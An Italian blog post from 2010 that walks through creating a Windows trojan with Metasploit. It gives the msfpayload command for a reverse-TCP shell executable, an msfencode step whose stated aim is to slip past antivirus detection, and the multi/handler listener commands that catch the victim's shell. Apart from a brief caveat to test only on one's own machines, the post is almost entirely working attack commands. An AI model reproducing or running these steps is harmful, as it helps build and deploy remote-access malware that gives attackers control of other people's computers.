sabato 27 novembre 2010

Creare un trojan con metasploit

Oggi vediamo come è possibile creare un programma trojan utilizzando il tool Metasploit, la procedura è molto semplice,tuttavia se intendete provarlo fatelo solo nella vostra rete e sulle vostre macchine, io come sistema bersaglio ho utilizzato una macchina virtuale con windows xp, mentre come sistema attaccante una macchina con la solita distribuzione Backtrack 4.Come payload useremo una "reverse shell" che si connetta al nostro indirizzo Ip, l'utilizzo della reverse shell è preferibile specie se sul sistema bersaglio è installato un firewall, con la reverse shell il trojan è un client e non un server , e i firewall sono molto più permissivi con i client che con i server. La prima operazione da compiere è  lanciare metasploit, cosa che potete fare comodamente da menu, dopo bisogna caricare il payload scelto con il seguente comando:

./msfpayload windows/shell_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=31117 X >/tmp/back.exe
In LHOST mettete il vostro indirizzo ip (in linux per trovarlo basta dare il comando "ifconfig"), LPORT è una porta a caso quindi potete anche lasciare quella scritta,"back.exe" è il nome dell' eseguibile scegliete quello che più vi piace, quando il file è pronto otterrete una risposta simile a questa:


La fase successiva è quella di cifrare il back.exe in modo da rendere la sua individuazione da eventuali antivirus più difficile, quindi diamo il comando:

./msfpayload windows/meterpreter/shell_reverse_tcp  R | msfencode -t exe >  back.exe

Il troyan è pronto, ma prima di testarlo bisogna mettere un server sul sistema attaccante in ascolto, useremo quello di metasploit, carichiamo innanzitutto il modulo "multi/handler" con il comando:

use exploit/multi/handler

In seguito settiamo il server con i comandi seguenti:

set payload windows/shell/reverse_tcp

set LHOST xxx.xxx.xxx.xxx (inserite il vostro ip)

set LPORT 31117 (inserite la porta scelta in precedenza)

Ora lanciamo il server con il comando :

exploit

Il server sul nostro sistema è in ascolto, adesso se eseguite il file back.exe sul sistema bersaglio(quello con windows),questo si connetterà al sistema attaccante restituendovi una shell di comando, in figura potete vedere la chiamata di back.exe al sistema attaccante.

 

Nessun commento:

Posta un commento